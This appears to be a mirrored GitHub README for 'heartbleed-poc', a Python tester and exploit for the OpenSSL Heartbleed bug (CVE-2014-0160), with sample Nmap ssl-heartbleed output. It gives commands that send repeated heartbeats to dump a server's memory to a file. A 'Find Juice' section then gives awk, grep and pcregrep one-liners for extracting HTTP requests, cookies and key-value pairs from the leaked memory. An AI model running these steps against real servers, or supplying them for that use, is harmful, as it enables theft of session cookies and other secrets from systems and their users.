nanyomy / heartbleed-poc Goto Github PK

HeartBleed Tester & Exploit
---------------------------

Usage: heartbleed-poc.py server [options]

Test for SSL heartbeat vulnerability (CVE-2014-0160)

Options:
  -h, --help            show this help message and exit
  -p PORT, --port=PORT  TCP port to test (default: 443)
  -n NUM, --num=NUM     Number of heartbeats to send if vulnerable (defines
                        how much memory you get back) (default: 1)
  -f FILE, --file=FILE  Filename to write dumped memory too (default:
                        dump.bin)
  -q, --quiet           Do not display the memory dump
  -s, --starttls        Check STARTTLS (smtp only right now)

Examples
--------

* Normal scan, will hit port 443, with 1 iteration:
python heartbleed-poc.py example.com

* Dump memory scan, will make 100 request and put the output in the binary file dump.bin:
python heartbleed-poc.py -n100 -f dump.bin example.com

The make sure you get different parts of the HEAP, make sure the server is busy, or you end up with repeat repeat.

* Check a mail server with STARTTLS (i.e. port 25):
python heartbleed-poc.py -s -p 25 example.com

* There used to be a -v switch to make the TLS version explicit, this is auto-detected now and has been removed

Find Juice
----------

The binary file will have juicy output in it, here are some simple ways of finding the goods:

* HTTP request:
awk '/[HPG][UEO][AST][DT ]/,/Connection/' dump.bin

* Cookies:
grep -a "^Cookie:" dump.bin

* Interesting Key Value Pairs:
pcregrep -ao "[A-Za-z0-9_-]+=[0-9a-zA-Z]+" dump.bin

NMAP NSE Script
---------------

Usage:
nmap --script=ssl-heartbleed -p 443 <server>

Example Output:

Starting Nmap 6.41SVN ( http://nmap.org ) at 2014-04-09 17:27 SAST
Nmap scan report for <example.org> (1.2.3.4)
Host is up (0.0068s latency).
PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|       
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://www.openssl.org/news/secadv_20140407.txt 
|_      http://cvedetails.com/cve/2014-0160/

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds